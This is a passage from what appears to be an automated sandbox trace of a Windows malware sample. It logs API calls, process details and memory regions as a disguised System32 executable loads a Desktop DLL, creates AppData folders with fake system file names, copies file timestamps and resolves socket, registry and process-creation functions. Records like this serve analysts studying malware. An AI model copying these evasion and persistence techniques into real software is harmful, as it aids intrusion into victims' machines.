(dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError (dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError (dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError (dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError (dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError (dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError (dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError (dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError (dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError (dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError (dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError (dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError (dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError (dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError (dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError (dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.926] SetLastError (dwErrCode=0x0) [0033.926] GetLastError () returned 0x0 [0033.927] SetLastError (dwErrCode=0x0) [0033.927] GetLastError () returned 0x0 [0033.927] SetLastError (dwErrCode=0x0) [0033.927] GetLastError () returned 0x0 [0033.927] SetLastError (dwErrCode=0x0) [0033.927] GetLastError () returned 0x0 [0033.927] SetLastError (dwErrCode=0x0) [0033.927] GetLastError () returned 0x0 [0033.927] SetLastError (dwErrCode=0x0) [0033.927] GetLastError () returned 0x0 [0033.927] SetLastError (dwErrCode=0x0) [0033.927] GetLastError () returned 0x0 [0033.927] SetLastError (dwErrCode=0x0) [0033.927] GetLastError () returned 0x0 [0033.927] SetLastError (dwErrCode=0x0) [0033.927] GetLastError () returned 0x0 [0033.927] SetLastError (dwErrCode=0x0) [0033.927] GetLastError () returned 0x0 [0033.927] SetLastError (dwErrCode=0x0) [0033.927] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0033.928] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0033.928] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0033.928] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af440 | out: lpSystemTimeAsFileTime=0x2af440*(dwLowDateTime=0xe1e775b0, dwHighDateTime=0x1d3dfba)) [0033.929] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2af378, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.929] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2af260, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.929] GetLastError () returned 0x0 [0033.930] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.930] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0033.930] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.930] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.930] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.930] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.930] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0033.930] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0033.930] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0033.930] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0033.930] GetLastError () returned 0xb7 [0033.930] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.930] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0033.930] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0033.930] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0033.930] wsprintfA (in: param_1=0x2af0e0, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.930] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0033.930] wsprintfA (in: param_1=0x2aefdc, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.930] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.931] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0033.931] CloseHandle (hObject=0x74) returned 1 [0033.931] GetLastError () returned 0x0 [0033.931] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0033.931] GetLastError () returned 0x0 [0033.931] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0033.931] GetSystemDirectoryA (in: lpBuffer=0x2af0e0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.931] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.931] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0033.931] CloseHandle (hObject=0x74) returned 1 [0033.931] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.931] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.931] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0033.933] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.933] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0033.933] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0033.933] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0033.933] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0033.933] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0033.933] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0033.933] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0033.933] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0033.933] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0033.933] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0033.933] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0033.933] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0033.933] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0033.933] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0033.933] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0033.933] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0033.933] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0033.934] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.935] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0033.935] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0033.935] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0033.935] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0033.935] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0033.935] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0033.935] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0033.935] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0033.935] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0033.935] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0033.935] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0033.935] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0033.935] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0033.935] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0033.935] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0033.935] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0033.935] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0033.935] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0033.935] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0033.935] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0033.935] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0033.936] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0033.936] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0033.936] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.936] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.936] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.936] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0033.956] HeapDestroy (hHeap=0x1360000) returned 1 Process: id = "40" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb40" os_pid = "0xc54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry /fn_args=\"DefaultInstall\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1805 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1806 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1807 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1808 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1809 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1810 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1811 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1812 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1813 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1814 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1815 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1816 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1817 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1818 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1819 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1820 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1821 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1822 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1823 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1824 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1825 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1826 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1827 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1828 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1829 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1830 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1831 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1832 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1833 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1834 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1835 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1836 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1837 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1838 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1839 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1840 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1841 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1842 start_va = 0x1200000 end_va = 0x139ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1843 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1844 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1845 start_va = 0x1200000 end_va = 0x133ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1846 start_va = 0x1390000 end_va = 0x139ffff entry_point = 0x0 region_type = private name = "private_0x0000000001390000" filename = "" Region: id = 2969 start_va = 0x13f0000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 2970 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Thread: id = 86 os_tid = 0xc58 [0033.968] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf6dc | out: lpSystemTimeAsFileTime=0x1cf6dc*(dwLowDateTime=0xe1ee99d0, dwHighDateTime=0x1d3dfba)) [0033.968] GetCurrentProcessId () returned 0xc54 [0033.968] GetCurrentThreadId () returned 0xc58 [0033.968] GetTickCount () returned 0x179ff [0033.968] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf6d4 | out: lpPerformanceCount=0x1cf6d4*=369194079) returned 1 [0033.968] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.969] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0033.969] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0033.969] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0033.969] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0033.969] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.969] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.969] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.969] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.969] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.969] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.969] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.969] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.969] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.969] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.969] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.970] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.970] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.970] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.970] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.970] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.970] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.970] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.970] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.970] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") 